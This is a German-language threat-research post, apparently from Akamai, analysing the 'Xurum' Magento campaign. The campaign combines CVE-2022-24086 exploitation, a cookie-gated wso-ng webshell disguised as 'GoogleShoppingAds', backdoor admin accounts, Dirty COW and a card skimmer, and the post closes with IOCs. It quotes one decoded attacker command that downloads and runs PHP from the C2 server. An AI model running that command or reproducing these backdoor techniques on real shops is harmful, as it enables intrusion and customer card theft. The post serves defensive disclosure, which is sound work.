Xurum: Neue Magento-Kampagne entdeckt
Forschungsarbeit von: Ron Mankivsky, Dennis German, Chen Doytshman, Maxim Zavodchik
Co-Autorin: Tricia Howard
Zusammenfassung
Forscher von Akamai haben eine laufende SSTI-Kampagne (Server-Side Template Injection) (CVE-2022-24086) entdeckt, die Websites des digitalen Handels angreift. Diese Kampagne zielt Magento-2-Stores ab. Wir haben sie wegen des Domain-Namens des Befehls- und Kontrollservers (C2), den der Angreifer benutzt, „Xurum“ genannt.
Unseren Beobachtungen zufolge ist diese Kampagne mindestens seit Januar 2023 aktiv. Der Angreifer interessiert sich scheinbar für die Zahlungsstatistiken der Bestellungen im Magento-Store des Opfers der vorangegangenen 10 Tage.
Er registriert eine neue Magento-Komponente und tarnt sie als „GoogleShoppingAds“.
Er verwendet eine erweiterte Webshell mit dem Namen „wso-ng“, die nur aktiviert wird, wenn der Angreifer den Cookie „magemojo000“ an die Backdoor-Komponente „GoogleShoppingAds“ sendet.
Die Webshell-Anmeldeseite tarnt sich als Fehlerseite und enthält ein verstecktes Anmeldeformular, über das die Anmeldedaten des Opfers ermittelt werden sollen.
Der Angreifer erstellt in Magento einen Backdoor-Admin-Nutzer namens „mageplaza“ oder „mageworx“, um die Täuschung fortzusetzen, denn dies sind die Namen von beliebten Erweiterungs-Stores von Magento.
Der Angreifer nutzt die ältere Schwachstelle Dirty COW (CVE-2016-5195), um Linux-Berechtigungen zu umgehen.
Die Beweise deuten auf Russland als Ursprungsort dieser Bedrohung hin.
Bei einigen der Websites, die an dieser Kampagne beteiligt waren, wurde beobachtet, dass sie mit einfachen JavaScript-basierten Skimmern infiziert waren, die nicht versuchten, ihre Existenz zu verschleiern oder zu verbergen.
Einführung
Der digitale Handel im Allgemeinen ist ein beliebtes Angriffsziel von Cyberkriminellen. Leider ist Magento aufgrund seiner Popularität besonders attraktiv (und lukrativ). Der bemerkenswerteste konkrete Angriff ist Magecart, bei dem die Angreifer JavaScript-basierte Skimmer einsetzen, um illegal an vertrauliche Nutzerinformationen zu gelangen. Diese Magecart-Bedrohungsakteure nutzen bekannte Webschwachstellen, um diese Übernahme zu realisieren.
Seit 2015 waren Magento-Stores Angriffen aus mindestens sieben Bedrohungsgruppen ausgesetzt, was für die Wichtigkeit der Plattform und den Erfolg eines Angriffs darauf spricht.
Anfang 2022 wurde die Schwachstelle CVE-2022-24086 entdeckt, mit der Angreifer die Magento-Template-Engine ausgenutzt haben, um beliebigen PHP-Code auf anfälligen Zielgeräten auszuführen. Der Exploit funktioniert in mehreren Schritten, mit gemeinsamen Angriffsvektoren, bei denen entweder der Checkout-Prozess oder die Wunschlistenfunktion missbraucht werden. Seit seiner Offenlegung hat sich diese Schwachstelle als primärer Einstiegspunkt für zahlreiche Magecart-Angreifer hervorgetan, die auf gefährdete Magento-2-Geschäfte abzielen.
In den letzten Monaten hat Akamai besonders eine Kampagne verfolgt, die konkret auf eine relativ kleine Anzahl von Magento-Implementierungen abzielt. Wir nannten die Kampagne Xurum, nach dem Domain-Namen des C2-Servers, den die Angreifer verwenden.
Ausnutzung von CVE-2022-24086 für den initialen Zugriff
Während der laufenden Kampagne haben wir beobachtet, wie Angreifer versuchten, zwei verschiedene Payloads von insgesamt vier IP-Adressen aus auszuführen (Abbildung 1). Diese IPs sind mit der Infrastruktur von zwei Hosting-Anbietern verknüpft: Hetzner in Deutschland und Shock Hosting in den USA.
Die erste Variante führt die Funktion file_get_contents FILM PHP aus, um eine Anfrage an den C2-Server xurum.com des Angreifers zu senden, um festzustellen, ob der Server für CVE-2022-24086 anfällig ist (Abbildung 2), während der Base64-Blob auf https://xurum.com/mo dekodiert.
Die zweite Variante ist die Second-Stage-Payload, bei der die Angreifer ihren schädlichen PHP-Code, der ebenfalls auf dem Server xurum.com gehostet wird, herunterladen und ausführen. Um die Erkennung zu umgehen, wird das für das Herunterladen und Ausführen des schädlichen Remote-PHP-Codes verantwortliche Angriffssegment mit Base64 verschlüsselt und über die PHP-Funktion shell_exec ausgeführt wird (Abbildung 3). Der verborgene Teil wird als php -r "`wget -qO- https://xurum.com/b.txt`;". dekodiert.
Die Dropzone von Xurum.com
Unsere Untersuchung des Servers xurum.com haben gezeigt, dass er sich in den Niederlanden befindet (Abbildung 4) und von dem russischen Hosting-Unternehmen VDSina.ru gehostet wird (Abbildung 5).
Zum Zeitpunkt unserer Untersuchung wurde diese Domain von vielen bekannten Websites zur Bewertung von Bedrohungen nicht als schädlich eingestuft (Abbildung 6). Diese vermeintliche Legitimität schafft mehr Vertrauen bei den Nutzern und ermöglicht es, dass die Aktivitäten der Angreifer im Wesentlichen unter dem Radar bleiben.
Was bedeutet „xurum“?
Da es mehrere Iterationen dieses Angriffs gibt, haben wir ihn xurum genannt, um diese Kampagne von anderen abzugrenzen.
Häufig wenden Angreifer eindeutige Namenskonventionen für ihre Domains oder Malware an, die versehentlich oder absichtlich zu ihrer Signatur werden. Während unserer Untersuchung der Bedeutung von „xurum“ sind wir auf zwei mögliche Interpretationen gestoßen.
Laut Google Translate ist xurum das lateinische Wort für „richtig“ und wird „als das Richtige tun“ übersetzt (Abbildung 7). Im WordSense-Wörterbuch hingegen heißt es, dass xurum das Wort für „Junge“ in einer inzwischen toten Sprache ist, die einst in Guatemala gesprochen wurde (Abbildung 8).
Bemerkenswert ist, dass die Angreifer zum Zeitpunkt dieses Blogbeitrags ihren Xurum-Server heruntergefahren haben und zu einem anderen Server gewechselt sind, der sich anscheinend noch in der Phase der Qualitätssicherung befindet.
Extraktion von Bestellinformationen und Backdooring von Magento
Das schädliche PHP-Skript, das vom Xurum-Server heruntergeladen und auf dem betroffenen Computer ausgeführt wird, weist mehrere Infektionsphasen auf.
Zunächst werden technische Informationen über das Opfer gesammelt, wie z. B.:
PHP-Version
ob der Exploit im Verzeichnis „/pub“ gelandet ist (gemeinsame Verzeichnisstruktur in Magento)
ob die Datei „/var/www/HTML/Vendor/magento/google-Shopping-ADS/registration.php“ vorhanden und schreibbar ist
der Inhalt der Datei „env.php“, die wichtige Informationen über die Anwendungen von Magento enthält, wie etwa umgebungsspezifische Einstellungen, aber auch geheime Informationen wie den Verschlüsselungsschlüssel, der zum Schutz von sensiblen Daten, wie Kennwörtern, Kreditkarten- und Kundeninformationen, verwendet wird
Dann wird ein versteckter Base64-Blob dekodiert und in der Datei „/var/www/HTML/Vendor/magento/google-Shopping-ads/Registration.php“ abgelegt (Abbildung 9).
Die neue Datei enthält faszinierende Inhalte. Statt einer eigenen Kopie einer Webshell, die auf ihrem C2-Server gehostet wird, verweist der Code in der neuen Datei auf ein öffentliches GitHub-Repository, das sich im Besitz eines Sicherheitsforschers namens „Bad Advertiser“ oder „@0xbadad“ befindet. In diesem Repository befindet sich eine bekannte Webshell namens wso-ng. Besonders interessant ist jedoch, dass die Webshell sich nicht auf die Festplatte des Servers befindet. Stattdessen wird sie nur aus dem Speicher abgerufen und ausgeführt, wenn auf die neu erstellte Seite „registration.php“ zugegriffen wird. Zum weiteren Schutz vor unbefugtem Zugriff muss die Anfrage außerdem einen bestimmten „magemojo000“-Cookie beinhalten, damit die Webshell erfolgreich ausgeführt werden kann.
Anschließend registriert der Angreifer die neue Webshell-Funktion als neue Magento-Komponente, die als „GoogleShoppingAds“ getarnt ist (Abbildung 10).
Nach der Installation der Backdoor rufen die Angreifer Informationen über die Zahlungsmethoden aus Kundenbestellung der vorhergehenden 10 Tage ab und extrahieren diese Daten zusammen mit den zuvor erfassten technischen Informationen in die Dropzone von xurum.com (Abbildung 11).
Im letzten Schritt erstellen die Angreifer einen Backdoor-Admin-Nutzer mit dem Namen „mageworx“ (oder „mageplaza“ in einigen Varianten). Diese Namen entsprechen Mageworx und Mageplaza, den beliebten Erweiterungs-Stores von Magento 2 (Abbildung 12). Diese Namenswahl ist wohl der Versuch, ihre Aktivitäten im Zusammenhang mit diesen seriösen Erweiterungsanbietern als legitim zu tarnen.
Bemerkenswert ist dabei eine interessante Nuance in den E-Mail-Adressen des Backdoor-Nutzers. Die E-Mail-Adresse developer@mageplazza.com enthält ein doppeltes „z“ in „mageplazza“, während die legitime Store-Domain nur ein „z“ im Namen mageplaza.com hat, was wie ein Tippfehler der Angreifer wirkt. Ein ähnlicher Tippfehler wurde in der E-Mail-Adresse des anderen Backdoor-Nutzers gemacht: support@magaworx.com, mit einem „a“ anstelle eines „e“ wie im ursprünglichen Filialnamen Mageworx.
Neue Webshell-Generation: wso-ng
Eine Web-Shell ist ein schädliches Skript oder Teilstück eines Codes, das Angreifer hochladen und auf einem Webserver ausführen, um unbefugt Zugriff auf den Server und seine zugrunde liegenden Dateien und Daten zu erhalten und diese dauerhaft zu kontrollieren.
Bei diesem Vorgang nutzen die Angreifer die sehr fortschrittliche Webshell wso-ng, die vor einigen Jahren von einem Sicherheitsforscher erstellt wurde. Laut dem Autor handelt es sich bei wso-ng um eine neue Generation der älteren und bekannten WSO (Web Shell by Orb).
Zusätzlich zu den typischen Funktionen von Webshells, wie z. B. der Erfassung von Systeminformationen sowie der Verwaltung von Dateien und SQL, verfügt wso-ng über weitere bemerkenswerte Funktionen, die sie von anderen Webshells unterscheiden (Abbildung 13).
Neue Funktionen
Eine dieser neuen Funktionen ist die versteckte Anmeldeseite. Beim Zugriff auf die Seite wird ein HTTP-Statuscode 404 („nicht gefunden“) ausgegeben, der den Eindruck erweckt, die Seite sei nicht vorhanden. Der sichtbare Inhalt wirkt auf den ersten Blick wie eine leere Seite (Abbildung 14). Bei der Prüfung des Quellcodes wird jedoch ein verborgenes Anmeldeformular angezeigt.
Das Formular wird mithilfe einer einfachen CSS-Täuschung, bei der es um 1.000 Pixel nach links verschoben ist, aus dem sichtbaren Bereich entfernt. Dieses verborgene Anmeldeformular „wartet“, bis der Nutzer das Kennwort eingibt.
Darüber hinaus kann wso-ng in VirusTotal integriert werden, was automatische Prüfungen der IP-Reputation der infizierten Maschine ermöglicht. Außerdem fragt sie nahtlos SecurityTrails, einen Service, des renommierten Threat-Intelligence-Unternehmens für Recorded Future, und IPinfo ab, um Informationen über andere Domains zu erhalten, die auf demselben Server gehostet werden.
Die Webshell verfügt auch über Angriffsfunktionen und versucht, die PHP-Sandboxes von Hosting-Unternehmen zu umgehen. Sie setzt verschiedene Techniken ein. Dazu gehören u. a. FastCGI- und PHP-Add-Filter-Angriffe, um deaktivierte PHP-Funktionen erfolgreich zu umgehen. Ferner bietet es eine Auto-Suggestion-Funktion zur lokalen Umgehung von Berechtigungen, wobei diese Exploits mit der spezifischen Linux-Version kompatibel sind, auf der die Webshell gehostet wird.
Eine detailliertere Analyse dieser Webshell werden wir in einem zukünftigen Blogbeitrag veröffentlichen.
Mit einem altmodischen Dirty-COW-Angriff die Rechte erweitern
Wir haben im Arsenal der Angreifer auf dem Server xurum.com ein weiteres Interessantes Tool gefunden: einen öffentlich zugänglichen Exploit einer älteren CVE-2016-5195-Schwachstelle namens Dirty COW zur lokalen Umgehung von Linux-Berechtigungen (Abbildung 15).
Web-Skimmer-Infektion
Da viele unserer Kunden mit einer Web Application Firewall (WAF) diese Kampagne effektiv abgewehrt haben, konnten wir keine weiteren Maßnahmen beobachten, die von den Bedrohungsakteuren ergriffen wurden. Bei unserer Untersuchung sind uns jedoch Websitenamen aufgefallen, die indirekt mit dieser Kampagne in Zusammenhang standen und im Ursprungs-/Referenz-HTTP-Header der Exploit-Anfrage angezeigt wurden.
Mindestens eine dieser Websites war mit einem einfachen Web-Skimmer infiziert. Der Skimmer wurde auf der Hauptseite installiert und verwendete keine Verschleierungstechniken. Er sammelte Kreditkarteninformationen und speicherte sie in einer Dropzone, die auf „smileface.site“ (Abbildung 16).
Auf einen Zugriffsversuch reagiert die Website mit einem kalten „Get out!“ (Abbildung 17).
Die IP-Informationen zeigen, dass sich der Server in Moskau befindet und vom russischen Hosting-Dienst „Reg.ru“ gehostet (Abbildung 18).
Zusammenfassung
Unsere Untersuchung dieser Kampagne ergab, dass sie mindestens bis Ende Januar 2023 zurückreicht. Die Angreifer haben akribisch gearbeitet, indem sie konkrete Magento-2-Instanzen angegriffen haben, anstatt ihre Exploits wahllos über das Internet zu verteilen. Sie verfügen über ein hohes Maß an Fachwissen über Magento und investieren viel Zeit in das Verständnis der internen Komponenten, die Einrichtung einer Angriffsinfrastruktur und das Testen ihrer Exploits an realen Zielen.
Diese Kampagne dient als praktisches Beispiel dafür, wie ältere Schwachstellen jahrelang nach der Offenlegung ausgenutzt werden, da Unternehmen Schwierigkeiten haben, mit Patches und Sicherheitsmaßnahmen Schritt zu halten.
Sicherheitsempfehlungen
Um den initialen Zugriff auf den Server zu verhindern, sollten Sicherheitsexperten stets die neuesten Patches installieren und sie durch eine WAF wie Akamai App & API Protector ergänzen.
Da das Hauptziel dieser Magecart-Bedrohungsakteure darin besteht, Magento-Seiten mit Webskimmern zu infizieren und Kreditkarteninformationen von Kunden zu stehlen, werden zusätzliche dedizierte Sicherheitslösungen dringend empfohlen. Diese Lösungen sollten Einblicke in das Verhalten von Browserskripten und Schutz vor clientseitigen Angriffen bieten.
Ein effektiver Ansatz besteht darin, Sicherheitsmaßnahmen näher an dem Ort zu implementieren, wo die tatsächlichen Angriffe auf Clients stattfinden. Dazu gehört das Erkennen versuchter Lesezugriffe aus sensiblen Eingabefeldern und von Datenextraktion. Wir empfehlen, diese Ereignisse umgehend zu erfassen, um durch Sicherheitsprodukte wie Client-Side Protection & Compliance eine schnelle und effiziente Abwehr zu erleichtern.
Wir halten Sie auf dem Laufenden
Bei unserer Analyse der jüngsten Versuche zur Ausnutzung der Schwachstelle Magento CVE-2022-24086 bei unseren Kunden sind wir auf weitere Kampagnen gestoßen, die wir derzeit untersuchen. Wir werden unsere Untersuchungen fortsetzen und unsere Erkenntnisse an die Sicherheit-Community weitergeben. Um weitere aktuelle Sicherheitsforschungsergebnisse zu lesen, folgen Sie uns auf Twitter.
IOCs
Die folgenden Bedrohungsindikatoren (Indicator of Compromise, IoC) sollen der Community helfen, die im Beitrag beschriebenen schädlichen Aktivitäten zu erkennen.
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Wert
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Typ
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104.36.229.168
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Angriffs-IP
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95.216.95.178
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Angriffs-IP
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95.216.94.99
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Angriffs-IP
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65.21.85.21
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Angriffs-IP
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xurum.com
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Malware-Hosting-Domain
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/var/www/html/vendor/magento/google-shopping-ads/registration.php
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Dateiname
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Mageworx
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Magento-Nutzer
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Mageplaza
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Magento-Nutzer
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developer@mageplazza.com
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E-Mail-Adresse
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support@magaworx.com
|
E-Mail-Adresse